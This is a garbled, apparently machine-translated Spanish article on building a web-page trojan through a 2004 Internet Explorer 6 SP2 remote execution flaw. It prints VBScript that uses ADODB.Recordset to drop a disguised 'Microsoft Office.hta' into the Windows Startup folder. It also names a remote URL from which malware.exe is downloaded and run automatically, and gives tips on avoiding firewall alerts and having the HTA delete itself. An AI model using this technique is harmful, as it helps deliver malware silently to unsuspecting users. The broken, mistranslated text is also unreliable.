Windows XP SP2 idea de Troya de hacer análisis

  
        Exploit: Microsoft Internet Explorer SP2 cualquier vulnerabilidades de ejecución remota de comandos Fecha: 2004-12-23 Los sistemas afectados: Microsoft Internet Explorer 6.0SP2 - Microsoft Windows XP Professional SP2 - Microsoft Windows XP Home SP2 de Microsoft Internet Explorer con una variedad de lagunas tales como Ayuda controles ActiveX y otros temas, un atacante remoto podría aprovechar esta vulnerabilidad sin interacción del usuario para ejecutar archivos y causar la ejecución de código malicioso ver: _bug &do = view &bug_id = 7272 &Palabra clave = "> individuos pródigos Liga verde hielo zorro. ensayos y análisis debido a que la página de prueba es publicada sistema de WinXP para la versión Inglés, las pruebas del sistema chino antes de su uso, primero debe establecer el siguiente directorio C: \\ Documents and Settings \\ All Users \\ Menú inicio \\ Programas \\ inicio \\ utilizo el prueba a la página de prueba, para saber si un servidor de seguridad, una aplicación le pedirá alg.exe acceso a la red, seleccione permitir, busque en C: \\ Documents and Settings \\ All Users \\ Menú inicio \\ programas \\ inicio \\ directorio encontrado para ser escrito un archivo "Microsoft Office.hta", ejecute "Microso Office.hta pies", encontró http://freehost07.websamba.com/greyhats/malware.exe descargar y ejecutar automáticamente una hermosa DEMO llama, directorio raíz C aparece programa malware.exe siguiente [cuenta que la ejecución firewall y ninguna alarma Microsoft Office.hta]! he leído el código fuente y encontró la causa de la alarma se writehta.txt en código del cortafuegos se accede a través de una base de datos remota para obtener Microsoft Office.hta ser escrito en código, si no visitamos HTA directamente a la base de datos y código de guión está escrito, no puede causar alarma cortafuegos Oh, es llamar ADODB.Recordset, el código utilizado para escribir un registro, el código es el código que encontré en el Internet en la siguiente forma :! curriculum vitae de error siguiente conjunto evanchik = CreateObject ( "ADODB.Recordset") Con "evanchik" evanchik .FIElds.Append, 200, "3000" Call Call .Open .AddNew .FIElds ( "evanchik"). Value = "significa menos me cago tenía que poner aquí "Call .AddNew .FIElds (" evanchik "). Value =" escribir aquí el directorio para ser escrito para iniciar el código específico " Llamar .Update Fin Con evanchik.Save "C: \\ Documents and Settings \\ All Users \\ Menú Inicio \\ Programas \\ Inicio \\ Microsoft Office.hta", adPersistXML evanchik.Close resolver el problema de cortafuegos, el siguiente paso es ver cómo una parte secreta después de arrancar archivo de HTA para ejecutarlo, no escribo cuestión específica, por favor refiérase a la vulnerabilidad objeto anterior código de explotación en línea, Internet es ahora el llamado "sin flash en el troyano"! hay que señalar que, HTA función de eliminación mejor, más automático, esto no va a correr de nuevo después de encontrar fácilmente más tarde! también esta vulnerabilidad para hacer el troyano se abrirá un archivo de ayuda, si no se siente muy bueno, se puede utilizar para ayudar a los parámetros de control en el primer apague automáticamente! en este punto, una página xpsp2 troyanos finalización con éxito de deficiencias :! 1. porque no podía encontrar una manera de ejecutar directamente de forma automática, y sólo escribió la carpeta de inicio, ejecute el archivo de HTA y otras máquinas para reiniciar, después de ser encontrado fácilmente aclarado de manera que los troyanos no se pueden descargar para funcionar 2. debido a que desea llamar el archivo htm CHM local o obtener permiso para escribir en el archivo, por lo que cuando el sistema no está instalado de forma predeterminada en la unidad C, no se puede escribir en el fichero Pieza!
Copyright © Conocimiento de Windows All Rights Reserved